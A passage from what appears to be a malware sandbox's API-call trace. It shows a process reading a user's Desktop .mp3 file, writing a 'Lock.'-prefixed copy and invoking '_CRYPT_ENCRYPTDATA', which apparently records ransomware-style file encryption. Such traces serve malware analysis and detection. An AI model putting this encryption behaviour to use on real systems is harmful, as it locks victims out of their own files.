lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0188.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0188.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0188.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0188.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0188.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0188.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0188.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0188.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0188.978] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/mfyUopWTtUAprVK7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\mfyuopwttuaprvk7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0188.980] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.980] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0188.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0188.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0188.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0188.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0188.981] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0188.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0188.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0188.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0188.982] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.mfyUopWTtUAprVK7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.mfyuopwttuaprvk7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0188.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0188.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0188.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.987] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0188.987] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0188.993] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x1777, lpOverlapped=0x0) returned 1 [0188.993] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0189.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.062] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0189.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0189.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0189.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11777) returned 0x2f24018 [0189.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0189.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0189.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0189.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11777) returned 0x3be0048 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0189.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0189.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0189.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.075] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.075] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.075] CharUpperBuffW (in: 